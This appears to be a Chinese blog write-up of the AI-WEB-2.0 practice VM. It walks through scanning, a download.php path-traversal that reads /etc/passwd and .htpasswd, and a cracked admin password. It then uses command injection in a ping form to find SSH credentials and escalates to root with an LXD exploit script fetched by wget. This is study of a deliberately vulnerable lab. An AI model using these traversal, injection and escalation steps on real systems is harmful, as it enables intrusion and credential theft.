AI-WEB-2.0 靶机实录

无法登录的靶机AI-WEB-2.0

1》》》目标信息收集

  1. 使用Netdiscover软件命令netdiscover发现局域网IP地址

以上是已探测到的ip内容

如何判断哪个IP是目标IP地址?

或使用fping -a -g 192.168.233.0/24命令 仅仅显示IP地址的即为已探测到的端口

探测结果有

192.168.233.1

192.168.233.131

192.168.233.134

已知192.168.233.131是我们kali虚拟机的IP地址。192.168.233.1为网关 那么192.168.233.134即为靶机IP

使用nmap命令查看对应端口

nmap -sS -sV -A -n 192.168.233.134

由上述结果看到 22 80 端口以进行开放

尝试访问192.168.233.134:80

到达登录页面 注册一个用户登录查看情况

到达登录界面后退出 使用drib扫描web目录

dirb http://192.168.233.134

--不明白这里红框中为什么要留意这里的内容。

对于扫描出的三个网页链接分别进行了登录

index页面即为登录页面

server-status页面显示无权访问

webadmin则是需要输入账号密码

至此目标信息收集完成

2》》》目标穿越漏洞

由登录后界面得知网站为文件分享 包含FileSharing内容

使用searchsploit命令搜索FileSharing的文件漏洞

可以查看到以上文件目录

查看扫描到文件内容

47659.txt 为与upload相关的内容

40010.html 为主页HTML相关内容

40009.txt出现了passwd的敏感字样 并且该页面关系与下载有关

在浏览器中尝试访问passwd文件内容 访问后下载了文件........................_etc_passwd

打开文件查看内容

--为什么锁定红框处内容 并且知道后2处为用户名称呢

--是否因为与root对应的目录相同才确定其为用户

_.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd

获取到两个用户对应名称 aiweb2 与 n0nr00tuser

读取apache文件配置

--从哪里获取到的这个apache文件的位置,为什么要获取该文件。

192.168.233.134/download.php?file_name=../../../../../../../../../../../../../etc/apache2/sites-enabled/000-default.conf

文件中此处看到passwd密码文件内容

通过192.168.233.134/download.php?file_name=../../../../../../../../../../../../..//etc/apache2/.htpasswd获取到passwd文件

文件中记录了加密的内容

aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/

这段加密破解

--目前不清楚密码破解流程,根据靶机介绍给的字典进行密码破解

--破解过程kali系统操作问题未能实现,需后续补充

aiweb2admin/c.ronaldo 最终破解的账号密码

3》》》命令执行漏洞

获取到账户密码后重新登录

http://192.168.233.134/webadmin

登录后后边加上robots.txt访问文件

http://192.168.233.134/webadminrobots.txt

具体为什么访问此页面解释如下

-------------------------------------------------------------------------------------------

robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统安装了Notepad,就可以创建和编辑它

 [1]  。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。

当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。百度官方建议,仅当您的网站包含不希望被搜索引擎收录的内容时,才需要使用robots.txt文件。如果您希望搜索引擎收录网站上所有内容,请勿建立robots.txt文件。

如果将网站视为酒店里的一个房间,robots.txt就是主人在房间门口悬挂的“请勿打扰”或“欢迎打扫”的提示牌。这个文件告诉来访的搜索引擎哪些房间可以进入和参观,哪些房间因为存放贵重物品,或可能涉及住户及访客的隐私而不对搜索引擎开放。但robots.txt不是命令,也不是防火墙,如同守门人无法阻止窃贼等恶意闯入者。

-------------------------------------------------------------------------------------------

访问后的页面

根据文件内容提示获取以下两个路径

http://192.168.233.134/webadmin/H05Tpin9555/

http://192.168.233.134/webadmin/S0mextras/

第一个页面中为ping测试的内容,可以通过命令执行漏洞方式来获取其他内容

而第二个页面中提示寻找一些有趣的东西在本文件夹中

首先在ping页面中输入127.0.0.1查看结果

显示为ping IP的反馈

使用管道符分割后再提交可以看到发生了变化

127.0.0.1|ls

发下其读出了文件夹下目录

已知此页面与需要查看文件页面为同级 如果返回上级页面再进入S0mextras下有可能会获取到对应的文件内容

使用

127.0.0.1|find ../S0mextras/ . -type f 2>/dev/null

获得以下结果

可以看到隐藏文件 .sshUserCred55512.txt

http://192.168.233.134/webadmin/S0mextras/.sshUserCred55512.txt

通过URL查看该文件 获得结果

账号:n0nr00tuser 密码:zxowieoi4sdsadpEClDws1sf

使用其登录ssh 登录成功

至此成功登入对应服务器

4》》》提权

登录到服务器后

 id

获取用户信息

 uname -a

获取内核信息

cat /etc/os-release

获取系统信息

查看本系统是否有提权漏洞

使用命令searchsploit linux 18.04

将存在漏洞的sh脚本文件复制到共享目录备用

cp /usr/share/exploitdb/exploits/linux/local/46978.sh /var/www/html

开启apache2服务

service apache2 start

利用漏洞文件需要下载build-alpine

下载好后再kali系统中解压 解压后运行

./build-alpine

生成日期时间的gz压缩包

使用kali ssh链接到目标靶机,使用之前获取的账号密码

ssh n0nr00tuser@192.168.233.134

命令获取漏洞文件以及压缩包

wget http://192.168.233.131/alpine-v3.16-x86_64-20220608_2136.tar.gz

wget http://192.168.233.131/46978.sh

提升文件控制权限

chmod 777 46978.sh

chmod 777 alpine-v3.16-x86_64-20220608_2136.tar.gz

普通用户使用如下命令获取权限的提升

./46978.sh -f alpine-v3.16-x86_64-20220608_2136.tar.gz

5》》》获取flag

获取权限后使用命令find / -name flag*

找到对应的flag文件即可打开

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值